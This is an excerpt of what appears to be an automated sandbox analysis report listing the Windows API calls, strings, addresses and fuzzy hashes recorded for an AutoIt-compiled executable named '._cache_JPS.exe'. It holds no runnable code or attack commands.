                                                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00A92A8B
                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00A92A9F
                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00A92AAE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                                        • API String ID: 157504867-2362178303
                                                                                                                                                        APIs
                                                                                                                                                        • GetVersionExW.KERNEL32(?,00000000), ref: 00AAE4A7
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00B2DC28,?,?), ref: 00AAE567
                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5BC
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AAE5C7
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AAE5DA
                                                                                                                                                        • GetSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5E4
                                                                                                                                                        • GetSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5F0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2717633055-0
                                                                                                                                                        APIs
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A93202
                                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00A93219
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00B057D7
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00B057EC
                                                                                                                                                        • LockResource.KERNEL32(?), ref: 00B057FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                        • String ID: SCRIPT
                                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                                        APIs
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AD6F7D
                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD6F8D
                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00AD6FAC
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AD6FD0
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6FE3
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD7022
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1605983538-0
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00C3C27A
                                                                                                                                                        • GetProcAddress.KERNEL32(?,00C35FF9), ref: 00C3C298
                                                                                                                                                        • ExitProcess.KERNEL32(?,00C35FF9), ref: 00C3C2A9
                                                                                                                                                        • VirtualProtect.KERNEL32(00A90000,00001000,00000004,?,00000000), ref: 00C3C2F7
                                                                                                                                                        • VirtualProtect.KERNEL32(00A90000,00001000), ref: 00C3C30C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1996367037-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00AD78CB
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00ADF04D
                                                                                                                                                        • CoCreateInstance.COMBASE(00B1DA7C,00000000,00000001,00B1D8EC,?), ref: 00ADF066
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00ADF083
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                        • String ID: .lnk
                                                                                                                                                        • API String ID: 2126378814-24824748
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNEL32(00A9C848,00A9C848), ref: 00AADDA2
                                                                                                                                                        • FindFirstFileW.KERNEL32(00A9C848,?), ref: 00B04A83
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$AttributesFindFirst
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4185537391-0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3964851224-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: NameUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                                        • Opcode ID: de944a3e5822349278b5774770516685b48fc306a4e1979021cc9327fa4c4fa2
                                                                                                                                                        • Instruction ID: 87dfa2463cdca0e7c2ec34415b72bb7120d73d1e56b962faad02162a9b664262
                                                                                                                                                        • Opcode Fuzzy Hash: de944a3e5822349278b5774770516685b48fc306a4e1979021cc9327fa4c4fa2
                                                                                                                                                        • Instruction Fuzzy Hash: 15C04CB140400DDFC715CB80C989DEFB7BCBB08300F104095A115E2040DB709B459B71
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E279
                                                                                                                                                        • timeGetTime.WINMM ref: 00A9E51A
                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00A9E646
                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00A9E651
                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E664
                                                                                                                                                        • LockWindowUpdate.USER32(00000000), ref: 00A9E697
                                                                                                                                                        • DestroyWindow.USER32 ref: 00A9E6A3
                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A9E6BD
                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00B05B15
                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00B062AF
                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00B062BD
                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B062D1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                        • API String ID: 2641332412-570651680
                                                                                                                                                        • Opcode ID: 8d22d9b7d36d5a98ca0da5fc54e86b2337f81c0aea3f595bcb61adf750e97cb8
                                                                                                                                                        • Instruction ID: 3e2573f2b4d2309f53245c114765ee2843a2ed07c4c694aa46ef8fb1eaa602ac
                                                                                                                                                        • Opcode Fuzzy Hash: 8d22d9b7d36d5a98ca0da5fc54e86b2337f81c0aea3f595bcb61adf750e97cb8
                                                                                                                                                        • Instruction Fuzzy Hash: A362A070604341DFDB24DF24C985BAA7BE4BF45304F1449ADF94A8B2D2DB75E888CB62
                                                                                                                                                        APIs
                                                                                                                                                        • ___createFile.LIBCMT ref: 00AC6C73
                                                                                                                                                        • ___createFile.LIBCMT ref: 00AC6CB4
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC6CDD
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00AC6CE4
                                                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC6CF7
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC6D1A
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00AC6D23
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC6D2C
                                                                                                                                                        • __set_osfhnd.LIBCMT ref: 00AC6D5C
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6DC6
                                                                                                                                                        • __close_nolock.LIBCMT ref: 00AC6DEC
                                                                                                                                                        • __chsize_nolock.LIBCMT ref: 00AC6E1C
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6E2E
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6F26
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6F3B
                                                                                                                                                        • __close_nolock.LIBCMT ref: 00AC6F9B
                                                                                                                                                          • Part of subcall function 00ABF84C: CloseHandle.KERNEL32(00000000,00B3EEC4,00000000,?,00AC6DF1,00B3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ABF89C
                                                                                                                                                          • Part of subcall function 00ABF84C: GetLastError.KERNEL32(?,00AC6DF1,00B3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ABF8A6
                                                                                                                                                          • Part of subcall function 00ABF84C: __free_osfhnd.LIBCMT ref: 00ABF8B3
                                                                                                                                                          • Part of subcall function 00ABF84C: __dosmaperr.LIBCMT ref: 00ABF8D5
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6FBD
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC70F2
                                                                                                                                                        • ___createFile.LIBCMT ref: 00AC7111
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AC711E
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00AC7125
                                                                                                                                                        • __free_osfhnd.LIBCMT ref: 00AC7145
                                                                                                                                                        • __invoke_watson.LIBCMT ref: 00AC7173
                                                                                                                                                        • __wsopen_helper.LIBCMT ref: 00AC718D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3896587723-2766056989
                                                                                                                                                        • Opcode ID: b6b76077fa331afb9940905771e64ca5d77c08ecd05c9d13d592ed3bf95ba0b4
                                                                                                                                                        • Instruction ID: 37441f6666b841b2cada77032096c7c0ce0341c42b102c9a12712f056e3da0b5
                                                                                                                                                        • Opcode Fuzzy Hash: b6b76077fa331afb9940905771e64ca5d77c08ecd05c9d13d592ed3bf95ba0b4
                                                                                                                                                        • Instruction Fuzzy Hash: 082203719042059BEB25DF68DC51FED7B75EF04320F2A426DE921AB2E2C7398D50CB51

                                                                                                                                                        APIs
                                                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00AD76ED
                                                                                                                                                        • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00AD7713
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AD7741
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AD774C
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD7762
                                                                                                                                                        • _wcsstr.LIBCMT ref: 00AD776D
                                                                                                                                                        • 74D51560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AD7789
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD77D2
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD77D9
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 00AD7804
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$FileInfoVersion$D51560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                        • API String ID: 2805241234-1459072770
                                                                                                                                                        • Opcode ID: fa9177d6ec1a3bc5b725e6d56578c3c132e1dc4c6f372efde90e47ba0e6b5617
                                                                                                                                                        • Instruction ID: c1ae0c8fe00f94410c354f565a7dc03c1429377885b31d652f39c0fd4fbef962
                                                                                                                                                        • Opcode Fuzzy Hash: fa9177d6ec1a3bc5b725e6d56578c3c132e1dc4c6f372efde90e47ba0e6b5617
                                                                                                                                                        • Instruction Fuzzy Hash: 40410172A04200BAEB05A7749D47EFF7BECEF15720F44049AF805E3193FB649A40A7A1

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00A91FBE
                                                                                                                                                        • IsWindow.USER32(?), ref: 00B0282E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Foreground_memmove
                                                                                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                        • API String ID: 3828923867-1919597938

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
control_flow_graph (block-level edge list not reproduced), starting at block af352a-af3569. API calls appearing in the graph: RegConnectRegistryW, RegCreateKeyExW, RegSetValueExW, RegCloseKey.
                                                                                                                                                        APIs
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF3626
                                                                                                                                                        • RegCreateKeyExW.KERNEL32(?,?,00000000,00B2DBF0,00000000,?,00000000,?,?), ref: 00AF3694
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00AF36DC
                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00AF3765
                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AF3A85
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AF3A92
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                        • API String ID: 536824911-966354055

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,00000000,00000001,00000000), ref: 00A9428C
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00AB1BC7: __wcsicmp_l.LIBCMT ref: 00AB1C50
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00A943C0
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00B0214E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_JPS.exe$CMDLINE$CMDLINERAW
                                                                                                                                                        • API String ID: 861526374-1552997918

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
control_flow_graph (block-level edge list not reproduced), starting at block ad78ee-ad7911. API calls appearing in the graph: WSAStartup, gethostname, gethostbyname, inet_ntoa, WSACleanup.
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                                        • API String ID: 208665112-3771769585

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00AAEA39
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AAEA56
                                                                                                                                                          • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                                                                                                                                                        • _wcsncat.LIBCMT ref: 00AAEA69
                                                                                                                                                        • __makepath.LIBCMT ref: 00AAEA85
                                                                                                                                                          • Part of subcall function 00AB2BFF: __wmakepath_s.LIBCMT ref: 00AB2C13
                                                                                                                                                          • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                          • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AAEABE
                                                                                                                                                          • Part of subcall function 00AAEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00AAEADA,?,?), ref: 00AAEB27
                                                                                                                                                        • _wcscat.LIBCMT ref: 00B032FC
                                                                                                                                                        • _wcscat.LIBCMT ref: 00B03334
                                                                                                                                                        • _wcsncpy.LIBCMT ref: 00B03370
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                                        • String ID: Include$\
                                                                                                                                                        • API String ID: 1213536620-3429789819
                                                                                                                                                        • Opcode ID: 474dc52e951cb2003f99d87c4f608ae84b1de8f95fdc5edaaf90a7e280b8980a
                                                                                                                                                        • Instruction ID: df9b942c7c492a041602e724515807a1907081cb154c5bbd5e1bf1aaf36cb102
                                                                                                                                                        • Opcode Fuzzy Hash: 474dc52e951cb2003f99d87c4f608ae84b1de8f95fdc5edaaf90a7e280b8980a
                                                                                                                                                        • Instruction Fuzzy Hash: 97518FB24063409FC305EF68ED85E97B7ECFB4A301B40499EF54587261EF749644CB6A

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A930B0
                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00A930BF
                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00A930D5
                                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00A930E7
                                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00A930F9
                                                                                                                                                          • Part of subcall function 00A9318A: LoadImageW.USER32(00A90000,00000063,00000001,00000010,00000010,00000000), ref: 00A931AE
                                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00A93167
                                                                                                                                                          • Part of subcall function 00A92F58: GetSysColorBrush.USER32(0000000F), ref: 00A92F8B
                                                                                                                                                          • Part of subcall function 00A92F58: RegisterClassExW.USER32(00000030), ref: 00A92FB5
                                                                                                                                                          • Part of subcall function 00A92F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00A92FC6
                                                                                                                                                          • Part of subcall function 00A92F58: LoadIconW.USER32(000000A9), ref: 00A93009
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                        • API String ID: 2880975755-4155596026
                                                                                                                                                        • Opcode ID: 516ece55583e47f459e0e68857938d4435b66c5060f176717bd3f46249d66021
                                                                                                                                                        • Instruction ID: 729980cb3a9e1ae1ec82ffbfa08d5b2eab4796f4edb33b59b8f4141928f330d0
                                                                                                                                                        • Opcode Fuzzy Hash: 516ece55583e47f459e0e68857938d4435b66c5060f176717bd3f46249d66021
                                                                                                                                                        • Instruction Fuzzy Hash: 54215EB1E00304ABCB00DFA9EC49B9DBFF5EB48311F1489AAE204A32E0DB7449408F91

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AEB777
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00AEB7A4
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00AEB7AE
                                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00AEB8AE
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AEB9DB
                                                                                                                                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00AEBA0F
                                                                                                                                                        • CoGetObject.OLE32(?,00000000,00B1D91C,?), ref: 00AEBA32
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00AEBA45
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AEBAC5
                                                                                                                                                        • VariantClear.OLEAUT32(00B1D91C), ref: 00AEBAD5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2395222682-0
                                                                                                                                                        • Opcode ID: 1e316a46b2cddc55daf97c5c29c3bc3758074653166b55de895e3fcbb51b5c67
                                                                                                                                                        • Instruction ID: 973e4e4d758a16adfecc62a4b5e63dd55a806b1f4e013f45cf4461bb04607866
                                                                                                                                                        • Opcode Fuzzy Hash: 1e316a46b2cddc55daf97c5c29c3bc3758074653166b55de895e3fcbb51b5c67
                                                                                                                                                        • Instruction Fuzzy Hash: D4C14571618345AFC700DF69C888A6BB7E9FF88358F00495DF58A9B251DB30ED01CB62

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A92F8B
                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00A92FB5
                                                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00A92FC6
                                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00A93009
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
